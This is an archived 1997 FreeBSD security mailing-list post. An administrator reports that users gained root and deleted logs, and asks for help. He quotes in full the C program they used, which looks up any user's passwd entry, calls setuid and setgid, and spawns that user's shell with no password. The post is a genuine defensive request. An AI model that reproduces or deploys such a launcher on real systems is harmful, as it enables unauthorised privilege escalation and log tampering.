Date: Tue, 10 Jun 1997 22:54:54 GMT From: Yuang Shuang-Long <edward@FreeBSD.cs.nccu.edu.tw> To: freebsd-security@freebsd.org Message-ID: <199706102254.WAA02221@FreeBSD.cs.nccu.edu.tw>
next in thread | raw e-mail | index | archive | help
Hi! folks: I have a trouble that some users use the following prog. to get root privilege, and the more they do some destructive thing. (eg. delete some file /var/log/* :-( ) I need your help... ********************************************************************** #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <pwd.h> #if 0 struct passwd { char *pw_name; /* user's login name */ char *pw_passwd; /* no longer used */ uid_t pw_uid; /* user's uid */ gid_t pw_gid; /* user's gid */ char *pw_age; /* not used */ char *pw_comment; /* not used */ char *pw_gecos; /* typically user's full name */ char *pw_dir; /* user's home dir */ char *pw_shell; /* user's login shell */ }; #endif void main(int argc, char *argv[]) { struct passwd *pw; if(argc < 2) { fprintf(stderr, "too few argument\n"); exit(-1); } if((pw = getpwnam(argv[1])) == NULL) { perror(argv[1]); exit(-1); } printf("uid:%d gid:%d home:%s shell:%s\n", pw->pw_uid, pw->pw_gid, pw->pw_dir, pw->pw_shell); if(setgid(pw->pw_gid) == -1) perror("setgid"); if(setuid(pw->pw_uid) == -1) perror("setuid"); chdir(pw->pw_dir); system(pw->pw_shell); } *************************************************************************
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199706102254.WAA02221>